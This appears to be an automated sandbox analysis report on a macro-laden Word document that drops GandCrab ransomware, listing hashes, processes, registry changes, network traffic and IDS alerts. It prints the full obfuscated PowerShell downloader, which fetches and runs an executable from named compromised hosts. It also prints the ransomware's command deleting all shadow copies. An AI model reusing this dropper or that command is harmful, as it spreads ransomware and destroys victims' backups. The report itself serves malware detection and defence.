File name: | efe3ece10170155b837ffe7f8b5f51a9bf6b37305f1bcef2f7aaf5d5442e5ea9.doc |
Full analysis: | https://app.any.run/tasks/76ebae9b-fe5d-4b22-bc84-9eb6f085476b |
Verdict: | Malicious activity |
Threats: | GandCrab is probably one of the most famous Ransomware. A Ransomware is a malware that asks the victim to pay money in order to restore access to encrypted files. If the user does not cooperate the files are forever lost. |
Analysis date: | June 12, 2019, 01:45:25 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/vnd.openxmlformats-officedocument.wordprocessingml.document |
File info: | Microsoft Word 2007+ |
MD5: | F1A6FF745F5284B57ED54D5A5F0F779B |
SHA1: | BFCA130ABCE178D9EDC0D3D060E6D78CD83B6EAE |
SHA256: | EFE3ECE10170155B837FFE7F8B5F51A9BF6B37305F1BCEF2F7AAF5D5442E5EA9 |
SSDEEP: | 768:/dlFUWTXBr+dGr8INgixD6JpPukZq+8sw556/zT8OeNHA917YIcs6xllNMTfNL/y:/L+m2Gr17xD0pPuH+aK3OAbUQ6BeTfN |
.docm | | | Word Microsoft Office Open XML Format document (with Macro) (53.6) |
---|---|---|
.docx | | | Word Microsoft Office Open XML Format document (24.2) |
.zip | | | Open Packaging Conventions container (18) |
.zip | | | ZIP compressed archive (4.1) |
Description: | - |
---|---|
Creator: | admin |
Subject: | - |
Title: | - |
ModifyDate: | 2019:03:22 14:08:00Z |
---|---|
CreateDate: | 2019:03:22 14:08:00Z |
RevisionNumber: | 2 |
LastModifiedBy: | Admin |
Keywords: | - |
AppVersion: | 16 |
HyperlinksChanged: | No |
SharedDoc: | No |
CharactersWithSpaces: | 1 |
LinksUpToDate: | No |
Company: | - |
TitlesOfParts: | - |
HeadingPairs: |
|
ScaleCrop: | No |
Paragraphs: | 1 |
Lines: | 1 |
DocSecurity: | None |
Application: | Microsoft Office Word |
Characters: | 1 |
Words: | - |
Pages: | 1 |
TotalEditTime: | - |
Template: | Normal.dotm |
ZipFileName: | [Content_Types].xml |
---|---|
ZipUncompressedSize: | 1635 |
ZipCompressedSize: | 426 |
ZipCRC: | 0xc8e48bf2 |
ZipModifyDate: | 1980:01:01 00:00:00 |
ZipCompression: | Deflated |
ZipBitFlag: | 0x0006 |
ZipRequiredVersion: | 20 |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2716 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\efe3ece10170155b837ffe7f8b5f51a9bf6b37305f1bcef2f7aaf5d5442e5ea9.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Exit code: 0 Version: 14.0.6024.1000 | ||||
2584 | c:\\windows\\system32\\cmd /c set p=power&& set s=shell&& call %p%%s% $iY1BROJW = '$RfRtd0V = new-obj-1169307106-20230152160ect -com-1169307106-20230152160obj-1169307106-20230152160ect wsc-1169307106-20230152160ript.she-1169307106-20230152160ll;$jZBv7ym = new-object sys-1169307106-20230152160tem.net.web-1169307106-20230152160client;$fKw3Ia5o = new-object random;$Tnv6rW0T = \"-1169307106-20230152160h-1169307106-20230152160t-1169307106-20230152160t-1169307106-20230152160p-1169307106-20230152160://www.blogs.nwp2.xcut.pl/wp//wp-content/themes/flatonpro/word.exe,-1169307106-20230152160h-1169307106-20230152160t-1169307106-20230152160t-1169307106-20230152160p-1169307106-20230152160://www.oshorainternational.com/wp-content/plugins/wp-db-ajax-made/word.exe,-1169307106-20230152160h-1169307106-20230152160t-1169307106-20230152160t-1169307106-20230152160p-1169307106-20230152160://www.testzagroda.hekko24.pl/word.exe,-1169307106-20230152160h-1169307106-20230152160t-1169307106-20230152160t-1169307106-20230152160p-1169307106-20230152160://www.tehms.com/otieusx/word.exe,-1169307106-20230152160h-1169307106-20230152160t-1169307106-20230152160t-1169307106-20230152160p-1169307106-20230152160://www.mutualamcoop.com.ar/components/word.exe\".spl-1169307106-20230152160it(\",\");$iexgFtl = $fKw3Ia5o.nex-1169307106-20230152160t(1, 65536);$hKtnbisMc = \"c:\win-1169307106-20230152160dows\tem-1169307106-20230152160p\148.ex-1169307106-20230152160e\";for-1169307106-20230152160each($uTCDZJ in $Tnv6rW0T){try{$jZBv7ym.dow-1169307106-20230152160nlo-1169307106-20230152160adf-1169307106-20230152160ile($uTCDZJ.ToS-1169307106-20230152160tring(), $hKtnbisMc);sta-1169307106-20230152160rt-pro-1169307106-20230152160cess $hKtnbisMc;break;}catch{}}'.replace('-1169307106-20230152160', $idzMw);$FP5lQvA = '';iex($iY1BROJW); | c:\windows\system32\cmd.exe | — | WINWORD.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
252 | powershell $iY1BROJW = '$RfRtd0V = new-obj-1169307106-20230152160ect -com-1169307106-20230152160obj-1169307106-20230152160ect wsc-1169307106-20230152160ript.she-1169307106-20230152160ll;$jZBv7ym = new-object sys-1169307106-20230152160tem.net.web-1169307106-20230152160client;$fKw3Ia5o = new-object random;$Tnv6rW0T = \"-1169307106-20230152160h-1169307106-20230152160t-1169307106-20230152160t-1169307106-20230152160p-1169307106-20230152160://www.blogs.nwp2.xcut.pl/wp//wp-content/themes/flatonpro/word.exe,-1169307106-20230152160h-1169307106-20230152160t-1169307106-20230152160t-1169307106-20230152160p-1169307106-20230152160://www.oshorainternational.com/wp-content/plugins/wp-db-ajax-made/word.exe,-1169307106-20230152160h-1169307106-20230152160t-1169307106-20230152160t-1169307106-20230152160p-1169307106-20230152160://www.testzagroda.hekko24.pl/word.exe,-1169307106-20230152160h-1169307106-20230152160t-1169307106-20230152160t-1169307106-20230152160p-1169307106-20230152160://www.tehms.com/otieusx/word.exe,-1169307106-20230152160h-1169307106-20230152160t-1169307106-20230152160t-1169307106-20230152160p-1169307106-20230152160://www.mutualamcoop.com.ar/components/word.exe\".spl-1169307106-20230152160it(\",\");$iexgFtl = $fKw3Ia5o.nex-1169307106-20230152160t(1, 65536);$hKtnbisMc = \"c:\win-1169307106-20230152160dows\tem-1169307106-20230152160p\148.ex-1169307106-20230152160e\";for-1169307106-20230152160each($uTCDZJ in $Tnv6rW0T){try{$jZBv7ym.dow-1169307106-20230152160nlo-1169307106-20230152160adf-1169307106-20230152160ile($uTCDZJ.ToS-1169307106-20230152160tring(), $hKtnbisMc);sta-1169307106-20230152160rt-pro-1169307106-20230152160cess $hKtnbisMc;break;}catch{}}'.replace('-1169307106-20230152160', $idzMw);$FP5lQvA = '';iex($iY1BROJW); | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | cmd.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3332 | "C:\windows\temp\148.exe" | C:\windows\temp\148.exe | powershell.exe | |
User: admin Company: Christian Foltin Integrity Level: MEDIUM Description: Attributable Updating Assigned Stairs | ||||
3800 | "C:\Windows\system32\cmd.exe" /c vssadmin delete shadows /all /quiet | C:\Windows\system32\cmd.exe | 148.exe | |
User: SYSTEM Company: Microsoft Corporation Integrity Level: SYSTEM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2140 | vssadmin delete shadows /all /quiet | C:\Windows\system32\vssadmin.exe | — | cmd.exe |
User: SYSTEM Company: Microsoft Corporation Integrity Level: SYSTEM Description: Command Line Interface for Microsoft® Volume Shadow Copy Service Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3884 | C:\Windows\system32\vssvc.exe | C:\Windows\system32\vssvc.exe | — | services.exe |
User: SYSTEM Company: Microsoft Corporation Integrity Level: SYSTEM Description: Microsoft® Volume Shadow Copy Service Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
(PID) Process: | (2716) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems |
Operation: | write | Name: | b*" |
Value: 622A22009C0A0000010000000000000000000000 | |||
(PID) Process: | (2716) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
Operation: | write | Name: | 1033 |
Value: Off | |||
(PID) Process: | (2716) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
Operation: | write | Name: | 1033 |
Value: On | |||
(PID) Process: | (2716) WINWORD.EXE | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage |
Operation: | write | Name: | WORDFiles |
Value: 1321992222 | |||
(PID) Process: | (2716) WINWORD.EXE | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage |
Operation: | write | Name: | ProductFiles |
Value: 1321992336 | |||
(PID) Process: | (2716) WINWORD.EXE | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage |
Operation: | write | Name: | ProductFiles |
Value: 1321992337 | |||
(PID) Process: | (2716) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word |
Operation: | write | Name: | MTTT |
Value: 9C0A0000E0DB8D8AC020D50100000000 | |||
(PID) Process: | (2716) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems |
Operation: | write | Name: | )," |
Value: 292C22009C0A000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000 | |||
(PID) Process: | (2716) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems |
Operation: | delete value | Name: | )," |
Value: 292C22009C0A000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000 | |||
(PID) Process: | (2716) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | UNCAsIntranet |
Value: 0 |
PID | Process | Filename | Type | |
---|---|---|---|---|
2716 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR3EC2.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2716 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\mso5E18.tmp | — | |
MD5:— | SHA256:— | |||
252 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\Y64RTIZ820FQCK5UA412.temp | — | |
MD5:— | SHA256:— | |||
2716 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3278D06E.png | — | |
MD5:— | SHA256:— | |||
2716 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~DF5D7E854859245773.TMP | — | |
MD5:— | SHA256:— | |||
2716 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~DFC862AB646A10BF4C.TMP | — | |
MD5:— | SHA256:— | |||
252 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF13617c.TMP | binary | |
MD5:33B4C42BAF9E3CA295E3BDCD51C02EAF | SHA256:B4273C31A01B0B90869574075D54D52E8098519587F61AE756B69729D0AF86A5 | |||
2716 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$e3ece10170155b837ffe7f8b5f51a9bf6b37305f1bcef2f7aaf5d5442e5ea9.doc | pgc | |
MD5:97F79829DA988248C5EB71A394CAFEA8 | SHA256:011A5B9C19C09577F748C1D86AA284CDF98923E8EFEF6FB89C8EA9457FF5C6AA | |||
3332 | 148.exe | C:\Recovery\345b46fe-a9f9-11e7-a83c-e8a4f72b1d33\boot.sdi | — | |
MD5:— | SHA256:— | |||
2716 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:B19FF5CEFD1DA5D0F2805A945B570C3C | SHA256:F75A592B67565D406D9D7F15EC8C276CD6D0D5E54AD5EF87413F565E44175FC9 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
252 | powershell.exe | GET | 200 | 202.143.99.87:80 | http://www.oshorainternational.com/wp-content/plugins/wp-db-ajax-made/word.exe | IN | executable | 573 Kb | malicious |
252 | powershell.exe | GET | 403 | 85.128.158.52:80 | http://www.blogs.nwp2.xcut.pl/wp//wp-content/themes/flatonpro/word.exe | PL | html | 2.14 Kb | malicious |
3332 | 148.exe | GET | 301 | 185.52.2.154:80 | http://www.kakaocorp.link/ | NL | html | 162 b | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3332 | 148.exe | 185.52.2.154:80 | www.kakaocorp.link | RouteLabel V.O.F. | NL | suspicious |
252 | powershell.exe | 202.143.99.87:80 | www.oshorainternational.com | CtrlS Datacenters Ltd. | IN | suspicious |
3332 | 148.exe | 185.52.2.154:443 | www.kakaocorp.link | RouteLabel V.O.F. | NL | suspicious |
252 | powershell.exe | 85.128.158.52:80 | www.blogs.nwp2.xcut.pl | Nazwa.pl Sp.z.o.o. | PL | malicious |
Domain | IP | Reputation |
---|---|---|
www.blogs.nwp2.xcut.pl |
| malicious |
www.oshorainternational.com |
| malicious |
www.kakaocorp.link |
| malicious |
PID | Process | Class | Message |
---|---|---|---|
252 | powershell.exe | A Network Trojan was detected | ET TROJAN EXE Download Request To Wordpress Folder Likely Malicious |
252 | powershell.exe | A Network Trojan was detected | ET TROJAN EXE Download Request To Wordpress Folder Likely Malicious |
252 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
252 | powershell.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
3332 | 148.exe | A Network Trojan was detected | MALWARE [PTsecurity] Blacklisted GandCrab Ransomware C2 Server |
3332 | 148.exe | A Network Trojan was detected | MALWARE [PTsecurity] Blacklisted GandCrab Ransomware C2 Server |